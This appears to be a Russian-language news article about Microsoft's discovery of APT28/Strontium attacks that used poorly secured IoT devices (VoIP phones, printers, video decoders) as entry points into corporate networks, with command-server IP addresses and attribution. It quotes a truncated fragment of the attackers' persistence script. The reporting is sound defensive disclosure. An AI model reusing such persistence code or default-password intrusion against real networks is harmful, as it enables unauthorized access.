Специалисты Центра анализа угроз Microsoft обнаружили атаки на корпоративные сети через устройства «интернета вещей» со стороны группировки Strontium. В некоторых случаях хакерам даже не приходилось ничего взламывать: достаточно было ввести заводские пароли.
В Microsoft обнаружили как минимум три случая подобных атак. Злоумышленники пытались получить доступ к внутренней сети через VOIP-телефон, офисный принтер и видеодекодер. В двух случаях оказалось достаточно ввести заводской пароль, а на третьем устройстве не было установлено последнее обновление безопасности.
Устройства использовали в качестве точки входа. Через них хакеры проникли в сеть и начали сканировать её в поиске других незащищённых устройств с учётными записями с высокими привилегиями.
После получения доступа к каждому из устройств злоумышленники устанавливали скрипт для сниффинга (перехвата) трафика в локальной сети. При перемещении между устройствами хакеры также внедряли скрипт для укоренения в системе.
then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &
--end contents of file--
скрипт для поддержания присутствия хакеров в сети
В Microsoft выяснили, что злоумышленники управляли устройствами с помощью удалённого сервера с IP-адресов 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251 и 128.199.199.187. Специалисты считают, что хакеры связаны с группировкой Strontium («Стронций»), также известной как Fancy Bear и APT28.
Эксперты по кибербезопасности и СМИ утверждают, что Fancy Bear связана с российским правительством. Группировке приписывают взлом демпартии США в 2016 году, попытки взломать американских чиновников и помешать европейским выборам в 2019 году.
Так как атаки на устройства «интернета вещей» Microsoft заметила на ранних стадиях, специалисты не установили конечную цель хакеров. Как отметили в компании, только за последние 12 месяцев сотрудники разослали 1400 уведомлений об атаках Strontium по всему миру. Большая часть целей относилась в государственной, IT, военной, оборонной, медицинской, образовательной и инженерной областям.
